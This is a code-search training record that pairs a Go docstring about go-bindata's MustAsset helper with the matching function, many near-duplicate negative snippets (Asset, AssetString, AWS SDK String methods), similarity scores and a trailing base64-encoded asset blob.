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\"\n}", "func (s DeleteAssetInput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s DeleteAssetInput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func MustAssetString(name string) string {\n\treturn string(MustAsset(name))\n}", "func (s AssociateAssetsOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func Asset(name string) ([]byte, error) {\n cannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n if f, ok := _bindata[cannonicalName]; ok {\n a, err := f()\n if err != nil {\n return nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n }\n return a.bytes, nil\n }\n return nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}" ]
[ "0.746333", "0.746333", "0.740569", "0.71174663", "0.69488007", "0.6845537", "0.68164825", "0.68164825", "0.6781284", "0.66662884", "0.6628625", "0.6628625", "0.6553138", "0.6479224", "0.64407486", "0.63944376", "0.6383354", "0.638272", "0.6288075", "0.6259238", "0.6237063", "0.61096984", "0.6066294", "0.6066294", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60609734", "0.60188246", "0.5993126", "0.59827405", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183", "0.59826183" ]
0.0
-1
MustAsset is like Asset but panics when Asset would return an error. It simplifies safe initialization of global variables.
func MustAsset(name string) []byte { a, err := Asset(name) if err != nil { panic("asset: Asset(" + name + "): " + err.Error()) } return a }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}", "func MustAsset(name string) []byte {\n\ta, err := Asset(name)\n\tif (err != nil) {\n\t\tpanic(\"asset: Asset(\" + name + \"): \" + err.Error())\n\t}\n\n\treturn a\n}" ]
[ "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818", "0.7499818" ]
0.0
-1
MustAssetString is like AssetString but panics when Asset would return an error. It simplifies safe initialization of global variables.
func MustAssetString(name string) string { return string(MustAsset(name)) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err := Asset(name)\n\treturn string(data), err\n}", "func AssetString(name string) (string, error) {\n\tdata, err 